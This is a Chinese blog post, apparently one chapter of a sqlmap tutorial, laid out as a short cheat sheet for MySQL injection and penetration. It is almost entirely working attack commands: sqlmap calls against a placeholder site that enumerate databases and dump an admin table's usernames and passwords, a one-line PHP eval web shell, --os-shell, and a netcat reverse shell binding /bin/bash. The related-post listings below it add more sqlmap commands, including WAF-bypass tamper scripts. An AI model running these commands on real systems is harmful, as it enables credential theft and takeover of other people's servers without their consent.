sqlmap.py mysql注入_sqlmap从入门到精通-第五章-5-3 使用sqlmap进行MySQL注入并渗透

最新推荐文章于 2024-04-12 03:38:48 发布
最新推荐文章于 2024-04-12 03:38:48 发布
阅读量163 收藏 2
点赞数
文章标签: sqlmap.py mysql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42275078/article/details/113346780
版权

5.3 使用sqlmap进行MySQL注入并渗透

这一小节没什么东西,作者前面都讲过,这里算是基本都是重复,大家看看,作为一个备忘录吧

5.3.1 检测SQL注入点

sqlmap.py -u "http://www.xx.com/index.php?id=3"

5.3.2 获取当前数据库信息

sqlmap.py -u "http://www.xx.com/index.php?id=3" --current-db

5.3.3 获取当前数据库表

sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx --tables

5.3.4 获取表列和数据

sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx -T admin --columns

sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx -T admin -C id,username,password --dump

5.3.5 获取webshell

1. 获取网站信息

--os-shell

2. 获取webshell

echo "<?php @eval($_POST['bmfx']);?>" > bmfx.php

5.3.6 总结及技巧

1. 自动提交参数和智能进行注入 sqlmap -u url --batch --smart

2. 获取所有信息 sqlmap -u url --batch --smart -a

3. 导出数据库 sqlmap -u url --dump-all

4. 直接连接数据库 sqlmap -d "mysql://root:root@127.0.0.1:3306/bmfx" -f --banner --dbs --users

这里如果是root权限可以直接使用--os-shell

5. 直接获取webshell sqlmap -u url --os-shell

6. 在Linux反弹shell

nc -l -p 9988 -e /bin/bash

nc xxxxx 9988

5f99327f578117ac53f1d1751de20874.png

甘剑
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试工具sqlmap基础教程
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
sqlmap.py mysql注入_利用sqlmap进行php+mysql注入(windows环境)
weixin_39567870的博客
01-19 235
老威SEO前段时间研究了一下sqlmap,其作为一款自动化的sql注入渗透工具,注入方式、注入成功后的取数据等等都是自动化的,非常适合我们这些小白前期玩玩渗透玩玩安全,它是用python写的,因此需要先安装python环境,一般都是傻瓜式安装操作一、sqlmap的安装1.python下载地址:2.sqlmap下载地址:把下载的sqlmap压缩包解压到文件夹sqlmap中,并将其复制粘贴到 “C:\...
sqlmap.py 脚本 sqlmap-master.zip
10-16
sqlmap的脚本,解压后可直接运行 列几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs //列数据库 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables -D DB_NAME //列DB_NAME的表 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell
SQLMAP
weixin_61899124的博客
06-29 350
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;
SQLMap
WX公众号-小白学安全
10-26 3723
概述 ​ SQLMap是一款开源、自动化的SQL注入漏洞检测工具,主要功能是扫描、发现并利用给定URL的SQL注入漏洞,能够检测动态页面中的get/post参数、cookie、http头、还可以查看数据、文件系统访问、甚至能够操作系统命令执行。 支持的数据库:MySQL、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb 检测方式:union联合查询注入、布尔盲注、时间盲注、报错注入、堆叠注入
sqlmap sqlmap.py 功能简介
stock_tt的专栏
05-23 1413
sqlmap.py 功能简介。 非常好的数据库工具。ACCESS 不行。其他的非常好用。下面介绍一下主要功能。 如果你知道数据库地址,用户名,可以直接连接。 sqlmap.py  -d  这个目前我感觉优势不大。最主要的是下面的功能。注入查询,和shell .注入:     支持一下几种注入。 盲注。  time based blind ,e
sqlmap 连接mysql_sqlmap从入门到精通-第三章-4-4-使用sqlmap直连MSSQL获取webshell或权限...
weixin_39896839的博客
01-30 739
4.4 使用sqlmap直连MSSQL获取webshell或权限在某些情况下可能不存在SQL注入漏洞,但是通过发现目标源代码泄露,备份泄露,文件包含等方法获取了数据库服务器的IP地址,数据库账户和密码,而且含有对外可以访问的端口,或者可以通过代理的方式能够访问到端口,简单点理解就是可以通过公网直连MSSQL数据库,那么这个时候就可以根据具体情况获取webshell或系统权限4.4.1 MSSQL数...
mysql space_sqlmap从入门到精通-第七章-7-21 绕过WAF脚本-space2mysqlblank.py&space2mysqldash.py...
weixin_35798040的博客
01-27 180
44. space2mysqlblank.py脚本通过随机空白字符替换payload中的空格,适用于mysql数据库测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2mysqlblank.py" --proxy="http://127.0.0.1:8080" -batch显示能够判断出来...
mysql 登录框注入_sqlmap之(六)----POST登陆框注入实战
weixin_35934037的博客
02-18 816
利用sqlmap进行POST注入,常见的有三种方法:注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py-r"c:\Users\fendo\Desktop\post.txt"-pn--dbs注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end D...
第十一节 Sqlmap注入参数2-01
09-15
"Sqlmap注入参数详解" Sqlmap是一款功能强大且广泛应用的SQL注入工具,本节课程将详细介绍Sqlmap的四个重要参数:强制设置无效值替换、自定义注入负载位置、设置Tamper脚本和设置DBMS认证。 Sqlmap强制设置无效值...
sqlmap工具的使用 (超详细附工具版)_python sqlmap
最新发布
m0_61408947的博客
04-12 788
python sqlmap.py -u “http://x.x.x.x/” --data=uname=admin&passwd=admin&submit=Submit -D “库名” -T “表名” -C “字段名” --dump。python sqlmap.py -u “http://x.x.x.x/” --data=uname=admin&passwd=admin&submit=Submit -D “库名” -T “表名” --columns。id=1*” -D “库名” --tables。
sqlmap简单中文说明
热门推荐
龙哥盟
02-19 3万+
整理:mickey更新svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devsqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell //执行SQL语句sqlmap.py -u "http://www.i
sqlmap mysql root_MySQL数据库之利用sqlmap进行mysql提权的小方法(win与liunx通用)
weixin_42557830的博客
01-19 183
本文主要向大家介绍了MySQL数据库之利用sqlmap进行mysql提权的小方法(win与liunx通用) ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助。1.连接mysql数据打开一个交互shell:sqlmap.py-dmysql://root:root@127.0.0.1:3306/test--sql-shellselect@@version;select@@p...
SQLMap详解
m0_62207482的博客
02-22 1174
SQLMap使用的Payload可以在xml/payloads.xml 中看到,也可以 根据相应的格式添加自己的Payload, 其中5级包含的Payload最多,会自动破解出 cookie、XFF等头部注入。杂,可能会遇到很多情况,tamper 不可能很全面地应对各种环境,所以建议读者在学 习如何使用自带的tamper的同时,最好能够掌握tamper的编写规则,这样在应对各种 实战环境时才能更自如。第三处的意思是参 数ID存在漏洞,是否要继续检测其他参数, 一般默认按回车键即可,如图3-4所示。
Python之SQLMap:自动SQL注入渗透测试工具示例详解
naer_chongya的博客
07-20 1967
在网络安全领域中,渗透测试是一项重要的任务。其中,SQL注入攻击是最常见的一种攻击方式之一。为了简化渗透测试过程中的繁琐操作,开发者们设计了各种自动化工具。其中,SQLMap是一款使用Python编写的强大工具,用于进行自动化的SQL注入渗透测试。本文将详细介绍SQLMap使用方法,包括Python语言环境的搭建、SQLMap的安装和配置、基本使用方法以及具体示例,以帮助读者更好地理解和运用这一强大的工具。
sqlmap使用
Likhaooo的博客
04-05 232
文章目录sqlmap介绍get注入检测级别属性头注入sqlmap*优先指定检测注入执行命令自定义请求包注入注入的选择其他 sqlmap介绍 sqlmap是一款自动化得sql注入工具,主要功能扫描判断是否存在sql注入漏洞,发现并利用给定得url得sql注入漏洞 get注入 sqlmap.py -u “url” 检测 sqlmap.py -u “url” --dbs 爆出数据库名 sqlmap.py -u “url” --tables -D “数据库名” 爆表 sqlmap.py -u “url” --col
sqlmap使用
weixin_55773382的博客
01-08 2932
一、基础测试有哪些漏洞 命令:sqlmap.py -u “url” 语句:sqlmap.py -u “http://192.168.29.76/sqli-labs-master/Less-1/?id=1” 二、爆出所有数据库命令 命令:sqlmap.py -u “url” --dbs 语句:sqlmap.py -u “http://192.168.29.76/sqli-labs-master/Less-1/?id=1” --dbs 三、爆指定数据库的表名 命令:sqlmap.py -u “http://19
Sqlmap命令详解
qq_45884195的博客
06-30 4845
sqlmap命令详解 目录0x01 sqlmap 确定目标1.1 直连数据库1.2 URL探测1.3 文件读取目标1.4 Google 批量扫描注入0x02 sqlmap 请求参数设置(一)2.1 设置 HTTP 方法2.2 设置 POST 提交参数2.3 设置参数分割符2.4 设置Cookie 头2.5 设置 User-Agent 头2.6 设置 Host 头2.7 设置 Referer 头2.8 设置 额外 HTTP 头2.9 设置 HTTP 协议认证2.10 设置 HTTP 代理0x03 sql
sqlmap使用详解:自动化SQL注入工具
"sqlmap用户手册提供了全面的指南,涵盖了如何使用这个强大的SQL注入工具进行安全测试。手册详细解释了sqlmap的功能和操作流程,包括它如何检测和利用不同类型的SQL注入漏洞,以及支持的数据库类型。" sqlmap是一款...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值